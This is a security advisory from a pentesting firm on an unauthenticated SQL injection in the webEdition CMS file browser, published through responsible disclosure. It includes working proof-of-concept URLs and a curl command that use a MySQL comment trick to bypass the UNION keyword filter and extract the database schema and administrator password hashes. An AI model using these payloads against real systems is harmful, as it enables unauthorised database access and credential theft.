Contact

Contact us

+49 241 510081-0
kontakt@redteam-pentesting.de
Contact form
RedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting HeaderRedTeam Pentesting Header

SQL Injection in webEdition CMS File Browser

RedTeam Pentesting discovered an SQL injection vulnerability in the file browser component of webEdition CMS during a penetration test. Unauthenticated attackers can get read-only access on the SQL database used by webEdition and read for example password hashes used by administrative accounts.

Details

  • Product: webEdition CMS
  • Affected Versions: webEdition 6.3.8.0 svn6985 down to 6.3.3.0,
  • probably earlier versions, too
  • Fixed Versions: 6.2.7-s1 - 6.3.8-s1
  • Vulnerability Type: SQL Injection
  • Security Risk: high
  • Vendor URL: http://www.webedition.org
  • Vendor Status: fixed version released
  • Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-005
  • Advisory Status: published
  • CVE: CVE-2014-2303
  • CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2303

Introduction

“webEdition is a flexible CMS for companies of every size. It offers a great amount of functionality and can be flexibly customized for individual needs. It is ideally suited for users who want to operate their web-site comfortably. Even the creation of custom web-applications is easily possible with webEdition.”

(translated from webEdition homepage)

More Details

The webEdition CMS contains a file browser component that allows browsing parts of the website’s filesystem structure. It is usually reachable under the following URL:

http://www.example.com/webEdition/we_fs.php

When browsing to individual directories, HTTP GET requests such as the following are sent to the web server:

GET /webEdition/we_fs.php?what=4&table=tblFile&id=1&order=IsFolder%20
    DESC,%20Text&filter= HTTP/1.1
Host: www.example.com
[...]

The server responds with JavaScript code that updates the directory listing:

<script>
top.clearEntries();
top.addEntry(13,"folder.gif","careers",1,"/en/careers");
top.addEntry(14,"folder.gif","company",1,"/en/company");
top.addEntry(15,"folder.gif","contact",1,"/en/contact");
top.addEntry(20,"we_dokument.gif","index.php",0,"/en/index.php");
top.writeBody(top.fsbody.document);
[...]
</script>

The requests which are sent to retrieve this information contain two interesting parameters: “table” with a value of “tblFile” which appears to name a database table, and the parameter “order” with a value of “IsFolder DESC, Text”, which contains parts of an SQL ORDER BY clause. In combination, these two parameters can be used to perform SQL injection attacks. It appears that they are embedded into an SQL query in a similar manner as follows:

SELECT ID,ParentID,Text,Path,IsFolder,Icon
       FROM tblFile
      WHERE [...]
   ORDER BY IsFolder DESC, Text

Using a table parameter value of tblFile WHERE 1=1 /* and an order parameter value of */, will result in a query similar to the following:

SELECT ID,ParentID,Text,Path,IsFolder,Icon
       FROM tblFile WHERE 1=1 /*
      WHERE [...]
   ORDER BY */

The queries executed by the CMS retrieve six columns, which can be seen in the application’s source code, or by injecting ORDER BY clauses with numeric column indexes into the query. Knowing the number of columns in a query, it is typically possible to use the UNION operator to obtain additional information, for example from other tables. As a security measure, webEdition implements filtering of the UNION keyword.

The web application checks whether the text “UNION” is part of user-supplied information that is entered into database queries and then blocks such queries. This behaviour is implemented in the file /webEdition/we/include/we_classes/database/we_database_base.class.php using the function preg_match('/[\s\("'\/)]union[\s(\/]/i', $queryWithoutStrings).

The CMS first checks whether the text “UNION” appears in the query string in any combination of upper- and lowercase characters. If that is the case, a regular expression is used to determine whether the word “UNION” appears in any context that is deemed dangerous by the application developers. However, the underlying MySQL database system supports embedding MySQL-specific query code within comments that contain an exclamation mark ("!") (see https://dev.mysql.com/doc/refman/5.5/en/comments.html).

For example, a query like

SELECT * FROM tblUsers WHERE 1=0 /*! OR 1=1 */

will yield no results on other database systems, but will return all rows on MySQL. Likewise, the text /*!UNION*/, which is not caught by the aforementioned regular expression, can be used instead of just “UNION” on MySQL, thus enabling injections that use the UNION operator:

$ curl --silent 'http://www.example.com/webEdition/we_fs.php?what=4'\
'&table=tblFile+WHERE+1=0+/*!UNION*/+SELECT+1,2,3,4,5,6/*&order=*/'
<script>
top.clearEntries();
top.addEntry(1,"6","3",5,"4");
[...]

Proof of Concept

The following URL lists the configured tables and their columns from the webEdition database:

http://www.example.com/webEdition/we_fs.php?what=4&table=tblFile+WHERE+
    1=0+/*!UNION*/+SELECT+1,2,TABLE_NAME,4,COLUMN_NAME,TABLE_SCHEMA+
    FROM+INFORMATION_SCHEMA.COLUMNS/*&order=*/

The following URL retrieves configured users and hashed passwords from the webEdition database:

http://www.example.com/webEdition/we_fs.php?what=4&table=tblFile+WHERE+
    1=0+/*!UNION*/+SELECT+1,2,passwd,4,5,username+FROM+tblUser/*&order=*/

Workaround

Disable the file browser component of webEdition, for example by deleting we_fs.php.

Fix

Update to a version with the suffix -s1. Those versions are available as updates for releases between 6.2.7 and 6.3.8. The newest, updated version would therefore be 6.3.8-s1.

Note that the version check of webEdition might tell you that there is no update available and that you are running Version “6.3.8 (6.3.8.0 Release, SVN-Revision 6985). It will still tell you that the newest available version is “6.3.8-s1 (6.3.8.0 Release, SVN-Revision 6985)”, so you can use the “Update-Repetition” function to get the fix for this vulnerability.

Security Risk

Attackers can exploit this SQL injection vulnerability to read contents of the webEdition database. This database contains, among published and potentially unpublished content of the CMS, the credentials of the administrative users of the CMS. If an attacker manages to find a password for a password hash extracted using this SQL injection vulnerability, the attacker could use these credentials to gain administrative privileges in the CMS. This poses a high risk.

Timeline

  • 2014-02-20 Vulnerability identified
  • 2014-03-04 Customer approved disclosure to vendor
  • 2014-03-06 CVE number requested and assigned
  • 2014-03-07 Vendor notified
  • 2014-03-10 Vendor acknowledges vulnerability
  • 2014-05-20 Vendor announces fixed versions
  • 2014-05-28 Advisory released

References

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de.